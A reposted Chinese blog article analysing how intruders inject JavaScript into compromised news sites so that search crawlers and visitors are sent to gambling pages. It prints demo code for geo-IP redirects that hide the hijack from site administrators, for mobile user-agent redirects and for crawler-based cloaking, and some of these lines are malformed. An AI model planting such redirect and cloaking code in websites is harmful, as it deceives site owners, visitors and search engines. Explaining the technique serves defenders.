【转载】博彩关键词排名的技术

【转载】原文地址http://news.secwk.com/article/newinfo/detail/731118634010774929#?sideActiveTab=fast

随着博彩行业的高速发展和暴利诱惑,很多小的黑客团体纷纷加入海外博彩公司,为他们做关键词排名,其实如果仔细分析这个行业还是有很多有意思的东西的,今天有个朋友给我发了一个博彩排名案例,让我帮忙分析一下,我索性就把发布到头条上来吧。

深入分析某网站被黑客入侵后做博彩关键词排名的技术

娱乐世界

今天的案例中黑客们用到的是网站劫持技术,可能很多从事白帽seo行业的朋友们对网站劫持还不是很了解,我就在开篇之前为大家先简单介绍一下“网站劫持”技术的应用。首先黑客们会先找到目标网站,一般都是新闻站居多,因为新闻类型的网站发布内容搜索引擎基本上都是秒收录,当黑客成功入侵目标站之后会在其网站首页插入js劫持代码或者修改其配置文件,再增加相应的劫持代码,到这里劫持功能就实现了,但是很多手段稍微高明一点的黑客还会加入判断条件,比如分地域跳转,分ip跳转。另外被劫持的网站搜索引擎爬虫抓取的时候抓取到的其实就是黑客们预先设置好的博彩关键词内容,人工从表面看还是原来正常的网站,但是查看源代码就会发现端倪,有的通过首页劫持代码实现,有的则是通过js调用判断等。而且现在博彩业已经做的很专业了,还判断你是pc浏览器还是移动浏览器而跳转到不同的自适应页面。

接下来给大家讲讲黑客是如何根据判断ip归属地来避免被发现的:

大家可能有的朋友以前也遇到过你打开一个网站看到的是博彩内容,但是你把该网站发给另外一个省份的朋友去看,他看到的却跟你不一样,这就是黑客对跳转做了判断ip归属地跳转,黑客之所以这样做应该是对网站管理员的登录ip省份做了判断处理,如果是该网站管理员所在的省份打开网站就是一个正常的网站,但是别的地区的人打开都会跳转到博彩站。可能我表述的不够清楚,我给大家举个小例子看看吧。

比如黑客找到网站管理员的ip为江西,那么黑客就会将该地区访问时的内容做一个判断,除江西之外的地方就又是一个判断,只不过前者打开是正常的网站,后者打开会跳转到博彩站,比如该网站是:www.toutiao.com,那么江西省的人打开看到的就还是www.toutiao.com【正常网站】,但是江西省之外的人打开就会跳转到wwww.baidu.com【假想这个网站是个博彩站】,接下来我来给大家演示一下上边说的两种情况:

var jump_myt = setInterval(function(){

if(remote_ip_info) {

clearInterval(jump_myt);

if(remote_ip_info.province == '江西' ||remote_ip_info.province == '安徽'||remote_ip_info.city =='北京'||remote_ip_info.city == '北京') {

window.location.href= 'http://www.toutiao.com';

}

else{

window.location= 'http://www.baidu.com';

}

}

<!--仅做演示,大家切勿拿去干坏事儿哈!-->

然后再跟大家说说判断操作系统的跳转做法:

如果相应的user-agent匹配关键字ipad、iphone os、midp、ucweb、android等移动端设备时则会跳转到http://www.baidu.com【假想这个站是博彩站】这个博彩站点,一般黑客们要实现这个功能,代码写法如下:

function browserRedirect() {

var sUserAgent=navigator.userAgent.toLowerCase();

var bIsIpad=sUserAgent.match(/ipad/i) == "ipad";

varbIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os";

var bIsMidp=sUserAgent.match(/midp/i) == "midp";

var bIsUc7=sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4";

var bIsUc=sUserAgent.match(/ucweb/i) == "ucweb";

var bIsAndroid=sUserAgent.match(/android/i) == "android";

var bIsCE=sUserAgent.match(/windows ce/i) == "windows ce";

var bIsWM=sUserAgent.match(/windows mobile/i) == "windows mobile";

if (bIsIpad ||bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) {

window.location.href='http://www.baidu.com/';

} else {

window.location='http://www.baidu.com';

}

}

<!--仅做演示,大家切勿拿去干坏事儿哈!--ps:头条号:黑客与极客的世界>

再看根据头部文件中的referer来判断搜索引擎爬虫,当爬虫去访问时会调用browserRedirect()函数。【browserRedirect()函数主要就是用来实现跳转判断的】黑客常用写法如下:

function go_bots_url(){

var init_flag ="93989",

bct =document.referrer,

bot =['baidu', 'google', 'yahoo', 'bing', 'soso', 'sogou', '360.cn', 'so.com','youdao', 'anquan', 'sm.cn', 'haosou'];

for (var iin bot) {

if(bct.indexOf(bot[i]) != -1) {

init_flag= "1245";

browserRedirect();

}

}

if(init_flag== "93989"){

call_init_error();

}

<!--仅做演示,大家切勿拿去干坏事儿哈!--ps:头条号:黑客与极客的世界>

以上方法已经充分体现了正常网站被黑客入侵后是如何通过代码劫持页面跳转到博彩页面的,然后再给大家看下被劫持之后的网站被黑客植入寄生虫程序之后是什么样子的;

深入分析某网站被黑客入侵后做博彩关键词排名的技术

劫持后的网站

文章来源:黑客与极客的世界,转载请注明来自

发表评论

电子邮件地址不会被公开。 必填项已用*标注